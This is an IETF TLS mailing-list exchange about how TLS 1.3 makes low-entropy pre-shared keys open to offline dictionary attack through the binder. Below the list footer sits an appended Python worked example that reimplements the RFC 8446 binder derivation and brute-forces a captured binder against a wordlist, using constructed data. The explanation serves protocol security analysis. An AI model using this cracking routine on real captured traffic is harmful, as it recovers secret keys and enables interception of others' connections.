On Tue, Apr 18, 2017 at 03:51:53PM -0400, Eric Rescorla wrote:
> On Tue, Apr 18, 2017 at 3:41 PM, Ilari Liusvaara <ilariliusva...@welho.com>
> wrote:
> >
> > On topic of PSKs, I noticed that TLS 1.3 makes it very easy to mount
> > dictionary attacks against PSK, regardless of DHE-PSK (especially to
> > recover the client PSK). I assumed that the document already documents
> > this, but I couldn't find any remark that using low-entropy PSKs is a very
> > bad idea.
> >
> Good point. As far as I can tell...
>
> 1. You can search the binder.
> 2. Because we forbid PSK with server authentication, you can also
> impersonate the server and then mount a dictionary attack (even w/o the
> binder).
AFAICT, if I wanted to extract a low-entropy client PSK, I wouldn't even
bother with 2, since 1 seems so much more efficient (all passive too!).

Also, I wonder if there are efficient ways of probing server PSKs (I didn't
come up with one, even in pure-PSK, due to binders making such probing
nontrivial).

-Ilari

_______________________________________________
TLS mailing list
TLS@ietf.org
https://www.ietf.org/mailman/listinfo/tls
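The attack Eric lists as point 1 and that Ilari calls "all passive", as an added worked example (not code from the thread or from any TLS implementation): the PSK binder in a TLS 1.3 ClientHello is an HMAC whose key is derived from the PSK alone and whose message is the hash of the ClientHello up to the binders, both of which a passive observer sees on the wire. An attacker therefore captures one ClientHello and re-runs the RFC 8446 key schedule (HKDF-Extract of the PSK, Derive-Secret with the "ext binder" label for an external PSK or "res binder" for a resumption PSK, then the "finished" expansion) for each candidate in a wordlist until the computed binder matches. The truncated ClientHello bytes, the weak PSK and the wordlist below are constructed stand-ins; SHA-256 is assumed as the cipher suite hash.

```python
import hashlib
import hmac
import struct

HASH = hashlib.sha256
HASH_LEN = HASH().digest_size  # 32 for SHA-256 suites


def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    # RFC 5869 HKDF-Extract: HMAC keyed with the salt over the input keying material.
    return hmac.new(salt, ikm, HASH).digest()


def hkdf_expand_label(secret: bytes, label: bytes, context: bytes, length: int) -> bytes:
    # RFC 8446 s7.1 HKDF-Expand-Label: HkdfLabel = uint16 length ||
    # opaque label<7..255> ("tls13 " + Label) || opaque context<0..255>
    full_label = b"tls13 " + label
    hkdf_label = (struct.pack("!H", length)
                  + bytes([len(full_label)]) + full_label
                  + bytes([len(context)]) + context)
    # RFC 5869 HKDF-Expand; one block is enough for length <= HASH_LEN.
    out, block, counter = b"", b"", 1
    while len(out) < length:
        block = hmac.new(secret, block + hkdf_label + bytes([counter]), HASH).digest()
        out += block
        counter += 1
    return out[:length]


def derive_secret(secret: bytes, label: bytes, transcript: bytes) -> bytes:
    # RFC 8446 s7.1 Derive-Secret(Secret, Label, Messages)
    return hkdf_expand_label(secret, label, HASH(transcript).digest(), HASH_LEN)


def compute_binder(psk: bytes, truncated_client_hello: bytes, external: bool = True) -> bytes:
    # RFC 8446 s4.2.11.2: the binder is the "finished"-style HMAC over the
    # ClientHello truncated just before the binders list, keyed from the PSK.
    early_secret = hkdf_extract(b"\x00" * HASH_LEN, psk)
    binder_key = derive_secret(early_secret, b"ext binder" if external else b"res binder", b"")
    finished_key = hkdf_expand_label(binder_key, b"finished", b"", HASH_LEN)
    return hmac.new(finished_key, HASH(truncated_client_hello).digest(), HASH).digest()


def dictionary_attack(observed_binder: bytes, truncated_client_hello: bytes,
                      candidates, external: bool = True):
    # Offline search: everything needed is in the captured ClientHello, so no
    # interaction with the client or server is required per guess.
    for cand in candidates:
        if hmac.compare_digest(compute_binder(cand, truncated_client_hello, external),
                               observed_binder):
            return cand
    return None


# Constructed sample data (not a real capture): the bytes of a ClientHello up
# to and including the PSK identities, a low-entropy external PSK, and the
# binder an observer would read off the wire for it.
TRUNCATED_CLIENT_HELLO = b"\x01\x00\x00\x80\x03\x03" + b"constructed ClientHello body up to identities"
WEAK_PSK = b"hunter2"
OBSERVED_BINDER = compute_binder(WEAK_PSK, TRUNCATED_CLIENT_HELLO)
WORDLIST = [b"password", b"123456", b"letmein", b"hunter2", b"qwerty"]


def run_demo():
    # Returns the recovered PSK, or None if it is not in the wordlist.
    return dictionary_attack(OBSERVED_BINDER, TRUNCATED_CLIENT_HELLO, WORDLIST)


if __name__ == "__main__":
    print("recovered PSK:", run_demo())
```

Each guess costs two HMACs and a handful of HKDF expansions, all offline and parallelisable, so the binder offers no more protection to a human-chosen PSK than a salted password hash would; (EC)DHE in the handshake does not change this because the binder is computed before any key share contributes.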